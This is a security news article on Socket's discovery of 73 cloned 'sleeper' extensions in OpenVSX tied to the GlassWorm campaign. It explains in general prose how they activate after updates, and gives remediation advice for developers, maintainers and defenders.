“This count may change as new updates continue to appear, but the pattern is consistent with earlier GlassWorm waves,” researchers at application security company Socket warned.
Socket identifies 73 "sleeper" extensions in the OpenVSX ecosystem
Socket reports a new wave of the GlassWorm campaign targeting the OpenVSX ecosystem through 73 extensions that behave as "sleepers": benign at first upload, then switching to malicious behavior after an update. Researchers say six of the extensions have already been activated and deliver malware, while they assess with high confidence that the remaining packages are either dormant or at least suspicious.
The extensions are clones of legitimate listings designed to deceive developers who do not inspect details beyond iconography and surface descriptions. In one documented case, the attacker used the same icon as the legitimate extension and adopted similar naming and description text. The primary distinguishing markers are the publisher name and the extension's unique identifier.
How the sleeper extensions activate: three loading techniques
Rather than embedding payloads in the initial upload, Socket found these extensions function as thin loaders that retrieve malicious components after installation. The company describes three primary methods observed across the cluster:
- The extension retrieves a secondary VSIX package from GitHub at runtime and installs it using CLI commands.
- The extensions load platform-specific compiled modules (.node files) that contain core logic, including fetching additional payloads and executing installation routines across supported editors.
- Some variants rely entirely on heavily obfuscated JavaScript that decodes at runtime to fetch and install malicious extensions, sometimes including encrypted or fallback URLs for payload retrieval.
Socket did not provide technical details about the newest payload. Previously observed GlassWorm activity targeted cryptocurrency wallet data, credentials, access tokens, SSH keys, and developer environment data.
GlassWorm's evolving strategy: benign uploads, later payloads
GlassWorm was first observed in October and initially used invisible Unicode characters to hide malicious code that stole cryptocurrency wallets and developer credentials. Since then, the campaign has expanded across multiple ecosystems, including GitHub repositories, npm packages, and both the Visual Studio Code Marketplace and OpenVSX. Researchers also observed trojanized crypto wallet clients targeting macOS users.
Earlier waves reached significant scale — a mid-March 2026 surge affected hundreds of repositories and dozens of extensions — but those large operations generated traces that multiple research teams used to block activity. The latest wave indicates the attacker is adapting tactics: submit innocuous, functioning extensions into a single ecosystem and introduce the malicious payload later via updates, rather than shipping malware in the original package.
What this means for developers, OpenVSX maintainers, and security teams
- Developers: Socket recommends that anyone who installed any of the listed extensions rotate all secrets and clean their development environment. Because the malicious capability can be introduced after installation, developers should validate publisher identity and the extension's unique identifier rather than relying solely on visuals like icons or descriptions.
- OpenVSX maintainers: The campaign underscores the risk of cloned listings and post-publish activation. Listings that mirror legitimate extensions in iconography and naming are a focal point for this wave, highlighting the need for scrutiny of publisher metadata and update behavior.
- Security teams and incident responders: The post-install activation model means defenders must monitor not only package provenance at install time but also update-time behavior and runtime fetches from external repositories such as GitHub. Socket's high-confidence assessment and the six confirmed activations provide concrete indicators to act on.
Conclusion: an adaptive supply-chain threat with continuing risk
GlassWorm's return via 73 OpenVSX "sleeper" extensions shows an attacker shifting to a lower-noise, staged approach: publish benign-looking extensions, then introduce malicious payloads later. Socket has published the full list of affected extensions and advises remediation steps for those who installed them. Because researchers previously disrupted large-scale waves by catching noisy operations early, the current tactic of delayed activation presents a different, subtler challenge — and one that will require close attention to publisher metadata, update behavior, and runtime fetches to detect and block.
